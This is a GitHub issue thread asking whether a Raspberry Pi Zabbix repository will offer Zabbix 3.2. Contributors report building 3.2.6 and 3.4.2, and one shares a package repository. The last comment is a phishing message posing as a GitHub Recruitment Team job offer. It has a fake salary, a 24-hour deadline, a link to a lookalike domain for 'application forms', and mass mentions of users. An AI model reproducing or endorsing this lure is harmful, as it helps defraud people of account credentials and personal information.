### ISSUE TITLE
Any plans to provide Zabbix 3.2 as well ?

### ISSUE THREAD

**Issue by github-user-1** [imkebe/zabbix3-rpi#1]

**Comment by imkebe** [comment]
Yes. I was planning it two month ago. Sorry but my device run out out free space. I think i going to update repo in one/two weeks.

**Comment by imkebe** [comment]
Maybe i gonna also provide a deb repo at launchpad.

**Comment by github-user-1** [comment]
Sounds very promissing - I want to give Zabbix a test and wanted to use my Pi for the test. Some install instructions would be handy as well (e.g. I was just thinking about giving MariaDB a try, etc...). Many thanks!

**Comment by vquie** [comment]
I actually wrote a script that compiles latest git tag for zabbix-agent and zabbix-proxy-sqlite3 and I am planning to provide these on github.

@imkebe Can you provide me with the configure commands?

**Comment by szimszon** [comment]
Hi,

Any news?

Thanks.

**Comment by TrantorRWS** [comment]
I've builded and tested 3.2.6 on m old pi with 256MB of ram.
It works but it run with only ~15MB of free ram.
Tested with pi v3 and it works very well :)
I will try to find some time to upload the deb file this week-end

**Comment by reedson** [comment]
Hi TrantorRWS, do you still have the deb files?

**Comment by fredprod** [comment]
I've just push 3.4.2 on my fork of this repo, have fun. Or use `deb https://repo.fredprod.com/ jessie main`

**Comment by rarents1975** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
estevE11, @davideuler, @gustin, @Lihou, @hchen19, @alexec, @grayoj, @ultimatechadguy, @zcsctc, @uakbr, @joesharratt1229, @GeroVanMi, @sergiocalde94, @seastar105, @ddkeeler, @sonixhyuga, @michgeek, @ductuan-nguyen, @Trojan0523, @egorkorolkov
